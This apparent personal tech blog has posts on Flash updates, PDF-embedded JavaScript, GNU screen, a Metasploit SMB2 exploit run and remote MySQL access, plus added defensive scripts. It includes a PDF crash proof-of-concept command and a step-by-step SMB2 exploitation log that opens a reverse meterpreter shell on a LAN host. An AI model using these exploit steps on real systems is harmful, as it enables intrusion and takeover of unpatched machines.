Friday, October 16, 2009

Updating Firefox 3.5 Flash Player in Ubuntu

This is just for my future reference in case I forget about it again.

I tried to view the dashboard on the Snorby demo page. Sadly, the wonderful graph did not show up. I checked my Flash plugin: it is a default installation of version 9.0. So I decided to check for the latest version at the Adobe site, and it is already version 10.0.32.18.

So I downloaded the Adobe Flash .deb package and installed it:
sudo dpkg -i install_flash_player_10_linux.deb

I restarted Firefox, and it still detected my Shockwave Flash as version 9.
So here is the trick for it:
sudo mv /usr/lib/swfdec-mozilla/libswfdecmozilla.so /usr/lib/swfdec-mozilla/libswfdecmozilla.old
sudo cp /usr/lib/adobe-flashplugin/libflashplayer.so /usr/lib/swfdec-mozilla/libswfdecmozilla.so
sudo cp /usr/lib/adobe-flashplugin/libflashplayer.so /usr/lib/firefox/plugins/

Restart your Firefox, and check about:plugins

Wednesday, October 14, 2009

PDF Structure + embedded JavaScript

Recently I’ve been studying the PDF structure and how it can be used as a platform to distribute malware and infect users. All I can say is that it is made possible through vulnerabilities in JavaScript handling. As my friend quoted from Didier Stevens’ statement, “PDF + JS = OMG”.

Actually, Didier Stevens has come out with a tool that allows you to create a PDF file and embed JavaScript code into it. It is a nice tool which allows us to learn about the structure of a PDF file and how JavaScript code is embedded into it. Have a look at it here.

Example PDF file that’ll crash Adobe Reader 8.1.2 on XP SP2:
$ python make-pdf-javascript.py -j "util.printf('%5000f', 0.0);" donotopen.pdf

From here, with complete JavaScript code to do a heap spray and execute shellcode, the PDF file is ready to be delivered to the user and infect the computer.
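The danger described above is exactly why a defender wants to know whether a PDF carries a JavaScript action before it reaches a user. The script below is an added example written for this page; it is not Didier Stevens’ make-pdf-javascript.py or pdfid, and none of it comes from the original post. It constructs a harmless one-page PDF in memory (the embedded script only calls app.alert), then counts the names that warrant inspection (/JavaScript, /JS, /OpenAction, /AA, /Launch) after decoding the #xx name escapes that a naive string search misses, and pulls the script body out of the /JS literal string. All function names are my own.

```python
"""Added example: spot the "PDF + JS" indicators in a PDF file.

Not Didier Stevens' tool and not from the original post.  The sample PDF
built here is constructed and harmless; the embedded script only calls
app.alert.  Names can be written with #xx hex escapes (/J#61vaScript), a
trick that defeats a plain search for "/JavaScript", so names are
normalised before counting.
"""
import re

# Names whose presence means the file deserves a closer look.
SUSPICIOUS_NAMES = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch")


def normalise_names(data: bytes) -> bytes:
    """Decode #xx escapes so /J#61vaScript is counted as /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1).decode(), 16)]), data)


def count_indicators(pdf: bytes) -> dict:
    """Return {name: occurrences} for every suspicious name found."""
    data = normalise_names(pdf)
    counts = {}
    for name in SUSPICIOUS_NAMES:
        # A name ends at a delimiter, so /JS must not also match /JSx.
        hits = re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", data)
        if hits:
            counts[name.decode()] = len(hits)
    return counts


def extract_js(pdf: bytes) -> list:
    """Return the bodies of /JS (...) literal strings.

    PDF literal strings balance unescaped parentheses, so the scan tracks
    depth and skips backslash escapes.  Scripts held in a stream object
    (/JS 5 0 R) need the stream decoded first and are not handled here.
    """
    data = normalise_names(pdf)
    scripts = []
    for m in re.finditer(rb"/JS\s*\(", data):
        i, depth = m.end(), 1
        start = i
        while i < len(data) and depth:
            ch = data[i:i + 1]
            if ch == b"\\":          # escaped byte: skip it and the next one
                i += 2
                continue
            if ch == b"(":
                depth += 1
            elif ch == b")":
                depth -= 1
            i += 1
        scripts.append(data[start:i - 1].decode("latin-1"))
    return scripts


def build_sample_pdf(script: bytes, obfuscate: bool = False) -> bytes:
    """Constructed sample: a one-page PDF whose catalog /OpenAction runs a
    JavaScript action as soon as the document opens.  With obfuscate=True
    the /JavaScript name is written with a #xx escape."""
    js_name = b"/J#61vaScript" if obfuscate else b"/JavaScript"
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /Type /Action /S " + js_name + b" /JS (" + script + b") >>",
    ]
    out = bytearray(b"%PDF-1.4\n")
    offsets = []
    for num, body in enumerate(objs, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n%s\nendobj\n" % (num, body)
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += (b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
            % (len(objs) + 1, xref_pos))
    return bytes(out)


if __name__ == "__main__":
    sample = build_sample_pdf(b"app.alert('constructed sample');", obfuscate=True)
    print("naive search for /JavaScript:", sample.count(b"/JavaScript"))
    print("indicators:", count_indicators(sample))
    print("scripts:", extract_js(sample))
```

The point of the obfuscated sample is that a plain search for “/JavaScript” reports nothing while the normalised count reports one; any triage script that grep-s for the literal name inherits that blind spot.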

GNU Screen rawks!

I’ve always heard about screen before but never had an interest in reading about it and trying it. Until recently, when a friend of mine used it and the way he manages his terminal with screen got my attention.

For a person who works a lot with terminal-based systems, screen can be quite a handy application to work with. With one terminal emulator running screen, I can edit code, run IRC, connect over SSH, read a log, and so on. I can detach and reattach the screen. If I accidentally close the terminal emulator, all I need to do is open it again and resume my previously-closed screen in the same state.

To start getting to know screen (for those who have never installed it yet), run this command:
sudo apt-get install screen
and
man screen

Other references you might want to look at:

http://www.kuro5hin.org/story/2004/3/9/16838/14935
http://jmcpherson.org/screen.html
http://aperiodic.net/screen/

Tuesday, October 6, 2009

Testing the new smb2 exploit

Recently I’ve downloaded Metasploit Framework 3.3 and tested the new unpatched SMB2 exploit on my local network ;-D.

Run the Metasploit Framework console:
[email protected] $ ./msfconsole

Scan the network for hosts that have SMB2 enabled:
msf > use auxiliary/scanner/smb/
msf auxiliary(smb2) > set RHOSTS 192.168.1.1-192.168.1.254
RHOSTS => 192.168.1.1-192.168.1.254
msf auxiliary(smb2) > set THREADS 100
THREADS => 100
msf auxiliary(smb2) > run

[*] 192.168.1.10 supports SMB 2 [dialect 2.2] and has been online for 21 hours
[*] 192.168.1.15 supports SMB 2 [dialect 2.2] and has been online for 43 hours
[*] 192.168.1.111 supports SMB 2 [dialect 2.2] and has been online for 30 hours
[*] 192.168.1.121 supports SMB 2 [dialect 2.2] and has been online for 80 hours
[*] 192.168.1.123 supports SMB 2 [dialect 255.2] and has been online for 10 hours
[*] 192.168.1.197 supports SMB 2 [dialect 255.2] and has been online for 8 hours

Quite a result! Now check the Windows version of the selected IP:
msf exploit(smb2_negotiate_func_index) > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS 192.168.1.15
RHOSTS => 192.168.1.15
msf auxiliary(version) > run

[*] 192.168.1.15 is running Windows Vista Ultimate Service Pack 1 (language: Unknown)
[*] Auxiliary module execution completed

It is Windows Vista. Now we’ll run the exploit against that IP:
msf auxiliary(version) > use exploit/windows/smb/smb2_negotiate_func_index
msf exploit(smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(smb2_negotiate_func_index) > set LHOST 192.168.1.46
LHOST => 192.168.1.46
msf exploit(smb2_negotiate_func_index) > set LPORT 5678
LPORT => 5678
msf exploit(smb2_negotiate_func_index) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(smb2_negotiate_func_index) > exploit

[*] Connecting to the target (192.168.1.15:445)…
[*] Started reverse handler
[*] Sending the exploit packet (854 bytes)…
[*] Waiting up to 180 seconds for exploit to trigger…
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.46:5678 -> 192.168.1.15:52010)

Succeeded! Now I’ve got access to the computer. That gives me full control over the computer:
meterpreter > sysinfo
Computer: GREEN
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
Language: ms_MY
meterpreter > execute -f cmd.exe -c -H -i

Process 636896 created.
Channel 2 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\>echo PLEASE DISABLE YOUR SMB2, OR I’LL RETURN > PLEASE DISABLE YOUR SMB2.txt

It is quite a dangerous situation when people are able to get into your computer without you knowing about it. And to make it worse, they can take your personal files and folders or spy on you.

If you’re connected to a public wired/wireless network (Starbucks, Old Town, or a lab), the recommended solution for the time being is to disable SMB2. You can get Microsoft’s published workaround for disabling SMB2 here.

Don’t be ignorant or you’ll be in trouble.

Thursday, October 1, 2009

Accessing MySQL database from outside localhost

When I install or use a certain application that needs a MySQL database, mostly it will be accessed from localhost, for example by the Apache server and the like. It is much more convenient and easy to configure.

However, as my project requires a dedicated centralized database server, and the application resides on another server, I have to configure the application and MySQL to allow connections from outside localhost. As we all know, by default MySQL only allows connections from within localhost.

So here’s the solution for this case:

Edit your /etc/mysql/my.cnf and change the bind address:
$ sudo vim /etc/mysql/my.cnf

Find the word ‘bind-address’ and change 127.0.0.1 to your server’s IP.

Then log in to the mysql console:
$ mysql -uroot -pYOURROOTPASSWORD
mysql> GRANT ALL PRIVILEGES ON *.* TO [email protected] IDENTIFIED BY "PASSWORD";
mysql> FLUSH PRIVILEGES;
mysql> exit
Now you can access your database from outside localhost:
$ mysql -uUSERNAME -pPASSWORD -h MYSQL_SERVER_IP
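The two settings changed above, the bind-address and the GRANT, decide how far the server is opened to the network, and a GRANT ALL PRIVILEGES ON *.* for a user who may connect from anywhere opens it a good deal further than a single application needs. The script below is an added example written for this page, not from the original post and not a MySQL tool: it audits a constructed my.cnf fragment and GRANT statements for exactly those over-broad settings and produces a scoped replacement grant. The database name, user name and application-server IP it uses are placeholders.

```python
"""Added example: audit how far a MySQL server has been opened to the network.

Not from the original post.  The my.cnf fragment and the GRANT statements
are constructed samples; the database, user and IP are placeholders.
"""
import re

# Constructed my.cnf fragment: the loopback bind has been commented out and
# replaced by a wildcard, a common result of "change 127.0.0.1 to your IP".
SAMPLE_MY_CNF = """\
[mysqld]
user         = mysql
port         = 3306
# bind-address = 127.0.0.1
bind-address = 0.0.0.0
"""

WILDCARD_BINDS = {None, "0.0.0.0", "::", "*"}   # every interface
LOOPBACK_BINDS = {"127.0.0.1", "::1", "localhost"}

GRANT_RE = re.compile(
    r"GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
    r"'?(?P<user>[^'@\s]+)'?@'?(?P<host>[^'\s;]+)'?",
    re.IGNORECASE,
)


def bind_address(cnf: str):
    """Effective bind-address of the file: the last uncommented assignment
    wins, as it does when MySQL reads my.cnf.  None when it is not set."""
    value = None
    for raw in cnf.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"bind-address\s*=\s*(\S+)", line)
        if m:
            value = m.group(1)
    return value


def audit_bind(cnf: str) -> list:
    """Findings about the listening interface; an empty list means nothing
    to flag.  An unset bind-address also means all interfaces."""
    addr = bind_address(cnf)
    if addr in LOOPBACK_BINDS:
        return []  # reachable from localhost only, the default the post starts from
    if addr in WILDCARD_BINDS:
        return ["bind-address %s listens on every interface; bind to the "
                "interface the application server reaches and restrict "
                "port 3306 with a firewall rule" % (addr or "(unset)")]
    return ["bind-address %s is reachable from the network; allow port 3306 "
            "only from the application server's address" % addr]


def audit_grant(stmt: str) -> list:
    """Findings for one GRANT statement (empty list = nothing to flag)."""
    m = GRANT_RE.search(stmt)
    if not m:
        return ["could not parse GRANT statement: %r" % stmt]
    findings = []
    if m.group("privs").upper().startswith("ALL"):
        findings.append("ALL PRIVILEGES granted; grant only the statements "
                        "the application actually issues")
    if m.group("scope") == "*.*":
        findings.append("global scope *.*; scope the grant to the "
                        "application's own database")
    if m.group("host") == "%":
        findings.append("host '%' accepts the login from any address; name "
                        "the application server's IP instead")
    return findings


def scoped_grant(user: str, db: str, host: str,
                 privs=("SELECT", "INSERT", "UPDATE", "DELETE")) -> str:
    """Least-privilege replacement for GRANT ALL ON *.*: one database, one
    source host, only the listed statements.  Create the user separately
    (CREATE USER) so the password never rides along in the GRANT."""
    return "GRANT %s ON `%s`.* TO '%s'@'%s';" % (", ".join(privs), db, user, host)


if __name__ == "__main__":
    # Placeholder names: the application server is assumed to be 192.168.1.46.
    broad = "GRANT ALL PRIVILEGES ON *.* TO 'snorby'@'%' IDENTIFIED BY 'x';"
    narrow = scoped_grant("snorby", "snorby", "192.168.1.46")
    for line in audit_bind(SAMPLE_MY_CNF) + audit_grant(broad):
        print("finding:", line)
    print("replacement:", narrow, "->", audit_grant(narrow) or "no findings")
```

Running it against the sample file reports the wildcard bind and all three problems with the broad grant, while the scoped grant it emits passes clean; the bind-address only chooses the interface, so a firewall rule limiting port 3306 to the application server is still wanted even when a specific IP is configured.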